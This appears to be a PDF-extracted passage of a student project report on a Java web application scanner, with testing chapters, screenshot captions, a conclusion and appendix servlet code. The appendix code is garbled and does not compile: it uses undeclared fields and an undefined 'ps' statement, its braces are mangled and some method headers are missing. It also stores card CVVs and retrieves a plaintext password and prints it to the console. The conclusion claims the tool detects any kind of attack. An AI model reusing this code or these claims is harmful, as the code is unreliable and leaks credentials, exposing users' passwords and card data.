If you notice an instance of cross-site Scripting notify the webmaster of that
site, and cc the CERT Coordination Center.
Unfortunately, security is often sacrificed in favor of functionality. But, if
you browse the Internet with scripting enabled, there is very little you can do
to protect your personal information. Cross-site scripting is easy to overlook,
and simple to correct. However, it can cause significant damageyour
passwords and credit card numbers can be unknowingly divulged to
untrusted sources.
CHAPTER 6
TESTING
-
8/9/2019 Web Application Scanner
44/73
Testing is used to uncover as many errors as possible before delivering the
software to the customer. Software testing is a critical element of software quality
assurance and represents the ultimate review of specification design and code
generation. Testing presents an interesting anomaly for the Software engineers.
Testing is the most important part of the software development process. For a
product to acquire a level of reliability, the product has to maintain highest level of
quality standard during all the phases of software development.
Software testing techniques provides analysis of the entire system that
validates the internal logic of the software components and exercises the input and
output control of the programs to reduce errors in the system development so as to
improve their performances.
6.1 VALIDATION TESTING
All the culmination of integration testing, software is completely assembled
as a package, interfacing error have been uncovered and corrected and a final
series of software tests the validation testing begins. Validation testing can be
defined in many ways, but a simple definition is that validation succeeds when the
software functions in a manner that can be reasonably expected by the
user/customer. Software validation conformity is followed with the following
requirements.
1) The functions or performed characteristics conform to specification and
are accepted.
2) A deviation from specification uncovered and a deficiency list is created.
Or error discovered at this step in this project is corrected prior to completion of
this project with the help of user by negotiation to establish a method for resolving
-
8/9/2019 Web Application Scanner
45/73
deficiencies. Thus, the proposed system under consideration has been tested by
using validation testing and found to be working satisfactorily.
6.2 OUTPUT TESTING
6.2.1 DEVIATION
After performing the validation testing, the next step is output testing of the
proposed system; since no system could be useful if does not produce the required
output in the specified format. The output generate or displayed by the system
under consideration are tested by asking the user about the format required by
them. Here, the output format is considered into two ways. One is on screen and
another is printed format.
The output format on the screen is format to be correct as the format was
designed in the system design phase according to the user needs. For the hard copy
also, the output comes out as the specified requirement by the user. Hence, output
testing does not result any correction in the system.
6.3 SYSTEM TESTING
The designed new system is tested with the sample data and final outputs are
verified with the actual manual reports. If these reports are satisfied then the
system is to put with the on-line data entry for the information system.
Thus, the system testing is to find out discrepancies between the developed
system and its original objective, current specification and the system
documentation. It also will verify for the compatibility of the system with the
operational environment.
6.2 ACCEPTANCE TESTING
-
8/9/2019 Web Application Scanner
46/73
User acceptance of the system is the key factor for the success of any
system. The system under consideration was tested for user acceptance by
constantly keeping in touch with the prospective system users at the time of
developing and making change wherever required. This is done in regard to the
following points:
Input Screen Design
Output Screen Design
On-line Message to Guide the User
Menu-driven System
Format of ad-hoc Report and other Outputs
-
8/9/2019 Web Application Scanner
47/73
CHAPTER 7
SCREENSHOTS
HOME PAGE
-
8/9/2019 Web Application Scanner
48/73
-
8/9/2019 Web Application Scanner
49/73
LOGIN PAGE
-
8/9/2019 Web Application Scanner
50/73
WRONG LOGIN
-
8/9/2019 Web Application Scanner
51/73
FORGOT PASSWORD
-
8/9/2019 Web Application Scanner
52/73
USER LOGIN PAGE
-
8/9/2019 Web Application Scanner
53/73
UPLOADING WAR FILE
-
8/9/2019 Web Application Scanner
54/73
SUCESSFUL UPLOAD
-
8/9/2019 Web Application Scanner
55/73
SAMPLE DEMO APPLICATION
-
8/9/2019 Web Application Scanner
56/73
SCANNED REPORT OF UNATTACKED APPLICATION
-
8/9/2019 Web Application Scanner
57/73
SCANNED REPORT OF SQL INJECTION ATTACKED PAGE
-
8/9/2019 Web Application Scanner
58/73
CHAPTER 8
CONCLUSION
Web scanner is an automated tool which helps us to detect the hacking
attack. This application describes the most common hacker attacks and provides
basic rules that can help to create more hack-resistant Web applications. It can be
able to detect vulnerabilities in applications which is more complex. We dint rely
on any database of known bugs so this tool is capable of detecting any kind of
attacks. Finally we conclude that Web Application scanner will be more helpful to
protect our application from the hackers.
8.1 FURTURE ENHANCEMENT
Future enhancements are one of the inevitable for any kind of software
project. Some of the enhancement features that can be applicable for our project
are listed as follows.
1. In future we will design a tool which will be capable of detecting all theattacks.2. We will provide open source tool.
3. We will give solution to the attacks.
4. We will detect and prevent all the attacks.
5.scanned reports will be sent as an mail to the customer.
-
8/9/2019 Web Application Scanner
59/73
APPENDIX
SAMPLE CODINGS
NEW USER DETAILS
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package com.webscanner.javaobj;
/**
*
* @author Maran*/
public class NewUserRDetails {
private String _username;
private String _firstname;
private String _lastname;
private String _password;
private String _mailid;
private String _date;
private String _holder;
private String _cardtype;
private String _valid;
private String _cvv;
private String _mailid1;
private String _issue;
public NewUserRDetails(String _username, String _firstname, String _lastname,String _password,String _mailid, String _date, String _mobilenumber, String
_holder, String _cardtype, String _valid, String _cvv, String _mailid1, String_issue) {
this._username = _username;
this._firstname = _firstname;
this._lastname = _lastname;
-
8/9/2019 Web Application Scanner
60/73
this._password = _password;
this._mailid = _mailid;
this._date = _date;
this._mobilenumber = _mobilenumber;
this._address1 = _address1;this._address2 = _address2;
this._sequrityquestion = _sequrityquestion;
this._answer = _answer;
this._usertype = _usertype;
this._holder=_holder;
this._cardtype=_cardtype;
this._valid=_valid;
this._cvv=_cvv;
this._mailid1=_mailid1;this._issue=_issue;
}
public String getAddress1() {
return _address1;
}
public void setAddress1(String _address1) {
this._address1 = _address1;
}
public void setAddress2(String _address2) {
this._address2 = _address2;
}
public String getAnswer() {
return _answer;
}
public void setAnswer(String _answer) {
this._answer = _answer;
}
-
8/9/2019 Web Application Scanner
61/73
public String getDate() {
return _date;
}
public void setDate(String _date) {this._date = _date;
}
public String getFirstname() {
return _firstname;
}
public void setFirstname(String _firstname) {
this._firstname = _firstname;}
public String getLastname() {
return _lastname;
}
public void setLastname(String _lastname) {
this._lastname = _lastname;
}
public void setMailid(String _mailid) {
this._mailid = _mailid;
}
public String getMobilenumber() {
return _mobilenumber;}
public void setMobilenumber(String _mobilenumber) {
this._mobilenumber = _mobilenumber;
}
-
8/9/2019 Web Application Scanner
62/73
public void setPassword(String _password) {
this._password = _password;}
public String getSequrityquestion() {
return _sequrityquestion;
}
public void setSequrityquestion(String _sequrityquestion) {
this._sequrityquestion = _sequrityquestion;
}
public String getUsername() {
return _username;
}
public void setUsername(String _username) {
this._username = _username;
}
public String getUsertype() {
return _usertype;
}
public void setHolder(String _holder) {
this._holder = _holder;
}
public String getHolder() {return _holder;
}
public void setCardtype(String _cardtype) {
this._cardtype = _cardtype;
}
-
8/9/2019 Web Application Scanner
63/73
public String getCardtype() {
return _cardtype;
}
public void setIssue(String _issue) {
this._issue = _issue;}
public void setValid(String _valid) {
this._valid = _valid;
System.out.println("date"+_valid);
}
public void setMailid1(String _mailid1) {
this._mailid1 = _mailid1;
}
public String getMailid1() {return _mailid1;
}
}
-
8/9/2019 Web Application Scanner
64/73
LOGINPAGE
package com.webscanner.action;
/** To change this template, choose Tools | Templates
* and open the template in the editor.
*/
import com.webscanner.dao.WebScannerDAO;
import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.*;
/**
*
* @author fostra
*/
public class loginpage extends HttpServlet {
/**
* Processes requests for both HTTP GET andPOST methods.
* @param request servlet request
* @param response servlet response
* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs
*/
protected void processRequest(HttpServletRequest request,
HttpServletResponse response)throws ServletException, IOException {
String username = request.getParameter("username");
String password = request.getParameter("password");
if (request.getParameter("buttonval").equals("Login")) {
-
8/9/2019 Web Application Scanner
65/73
String userType = new WebScannerDAO().checkLogin(username,password);
}
else if (userType.equalsIgnoreCase("gold")) {
System.out.println("Login Successful");RequestDispatcher rs1 =
request.getRequestDispatcher("/frmgolduser.jsp");
rs1.forward(request, response);
}
}
else {
System.out.println("Login Failure");
RequestDispatcher rs2 = request.getRequestDispatcher("/failure.jsp");
rs2.forward(request, response);}
}
}
@Override
protected void doGet(HttpServletRequest request, HttpServletResponseresponse)
throws ServletException, IOException {
processRequest(request, response);
}
@Override
protected void doPost(HttpServletRequest request, HttpServletResponseresponse)
throws ServletException, IOException {
processRequest(request, response);
}
}
-
8/9/2019 Web Application Scanner
66/73
FORGOT PASSWORD
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.*/
package com.webscanner.action;
import com.webscanner.dao.WebScannerDAO;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;
import java.sql.*;
import javax.servlet.RequestDispatcher;
/**
*
* @author Maran
*/
public class ForgetPasswordAction extends HttpServlet {
/**
* Processes requests for both HTTP GET andPOST methods.
* @param request servlet request
* @param response servlet response
* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs*/
protected void processRequest(HttpServletRequest request,HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/html;charset=UTF-8");
PrintWriter out = response.getWriter();
-
8/9/2019 Web Application Scanner
67/73
try {
String _username = request.getParameter("username");
String _date = request.getParameter("date");
String _month = request.getParameter("month");
String _year = request.getParameter("year");String _mailid = request.getParameter("mailid");
String _question = request.getParameter("question");
String _answer = request.getParameter("answer");
String password = "";//request.getParameter("password");
ps.setString(2, _date + "/" + _month + "/" + _year);
ps.setString(3, _mailid);
ps.setString(4, _question);
ps.setString(5, _answer);
ResultSet rs = ps.executeQuery();
if (rs.next()) {
password = rs.getString(1);
System.out.println("password" + password);
}
}
}
//
/**
* Handles the HTTP GET method.
* @param request servlet request
* @param response servlet response
* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs*/
throws ServletException, IOException {
processRequest(request, response);
}
-
8/9/2019 Web Application Scanner
68/73
/**
* Handles the HTTP POST method.
* @param request servlet request
* @param response servlet response* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs
*/
@Override
protected void doPost(HttpServletRequest request, HttpServletResponseresponse)
throws ServletException, IOException {
processRequest(request, response);
}
/**
* Returns a short description of the servlet.
* @return a String containing servlet description
*/
@Override
public String getServletInfo() {
return "Short description";
}//
}
}
-
8/9/2019 Web Application Scanner
69/73
GOLD_USER PAGE
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.*/
package com.webscanner.action;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.sql.*;
import javax.servlet.*;
import java.io.File.*;
/**
*
* @author fostra
*/
public class Gold_User_Page extends HttpServlet {
/**
* Processes requests for both HTTP GET andPOST methods.
* @param request servlet request
* @param response servlet response* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs
*/
protected void processRequest(HttpServletRequest request,HttpServletResponse response)
throws ServletException, IOException {
-
8/9/2019 Web Application Scanner
70/73
response.setContentType("text/html;charset=UTF-8");
PrintWriter out = response.getWriter();
finally {
out.close();
}}
//
/**
* Handles the HTTP GET method.
* @param request servlet request
* @param response servlet response
* @throws ServletException if a servlet-specific error occurs* @throws IOException if an I/O error occurs
*/
@Override
protected void doGet(HttpServletRequest request, HttpServletResponseresponse)
throws ServletException, IOException {
processRequest(request, response);
}
/**
* Handles the HTTP POST method.
* @param request servlet request
* @param response servlet response
* @throws ServletException if a servlet-specific error occurs
* @throws IOException if an I/O error occurs
*/
@Overrideprotected void doPost(HttpServletRequest request, HttpServletResponseresponse)
throws ServletException, IOException {
processRequest(request, response);
}
-
8/9/2019 Web Application Scanner
71/73
/**
* Returns a short description of the servlet.
* @return a String containing servlet description
*/
@Overridepublic String getServletInfo() {
return "Short description";
}//
}
-
8/9/2019 Web Application Scanner
72/73
REFERENCES
1. Ed Roman, Mastering Enterprise Java Beans, John Wiley &Sons Inc., 1999.
2. Elliotte Rusty Harold, Java Network Programming, OReilly publishers,2000
3. H.M.Deitel, P.J.Deitel, "Java : how to program", Fifthe edition, PrenticeHall of India private limited.
4. Hortsmann & Cornell, CORE JAVA 2 ADVANCED FEATURES,VOL II, Pearson Education, 2002. .
5. Patrick Naughton, COMPLETE REFERENCE: JAVA2, TataMcGraw-Hill, 2003.
6. Web reference: http://java.sun.com
Byte-code Engineering References
[AFM97] O. Agesen, S. N. Freund, and J. C. Mitchell. Adding Type Parameterization to the Java
Language. InProceedings OOPSLA97, Atlanta, GA, 1997.
[AP98] D. Antonioli and M. Pilz. Statistische Analyse von Java-Classfiles. In Clemens Cap,editor,Proceedings JIT98. Springer, 1998.
[BD98] B. Bokowski and M. Dahm. Poor Mans Genericity for Java. In Clemens Cap, editor,Proceedings JIT98. Springer, 1998.
[BS98] B. Bokowski and A. Spiegel. Barat A Front-End for Java. Technical report, FreieUniversitat Berlin, 1998.
[CCK98] Geoff Cohen, Jeff Chase, and David Kaminsky. Automatic Program Transformationwith JOIE. InProceedings USENIX Annual Technical Symposium, 1998.
[CCZ97] Suzanne Collin, Dominique Colnet, and Olivier Zendra. Type Inference for LateBinding. The SmallEiffel Compiler. InProceedings JMLC97, 1997.
http://java.sun.com/http://java.sun.com/ -
8/9/2019 Web Application Scanner
73/73
SQL INJECTION RFERENCE
http://www.unixwiz.net/techtips/sql-injection.html
http://www.imperva.com/resources/glossary/sql_injection.html
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners
CROSS SITE SCRIPTING
http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/tech_tips/malicious_code_mitigation.html
http://www.kb.cert.org/vuls/id/672683
http://www.kb.cert.org/vuls/id/642239
http://www.kb.cert.org/vuls/id/560659
http://www.unixwiz.net/techtips/sql-injection.htmlhttp://www.imperva.com/resources/glossary/sql_injection.htmlhttp://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttp://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scannershttp://www.cert.org/advisories/CA-2000-02.htmlhttp://www.cert.org/tech_tips/malicious_code_mitigation.htmlhttp://www.kb.cert.org/vuls/id/672683http://www.kb.cert.org/vuls/id/642239http://www.kb.cert.org/vuls/id/560659http://www.unixwiz.net/techtips/sql-injection.htmlhttp://www.imperva.com/resources/glossary/sql_injection.htmlhttp://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppthttp://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scannershttp://www.cert.org/advisories/CA-2000-02.htmlhttp://www.cert.org/tech_tips/malicious_code_mitigation.htmlhttp://www.kb.cert.org/vuls/id/672683http://www.kb.cert.org/vuls/id/642239http://www.kb.cert.org/vuls/id/560659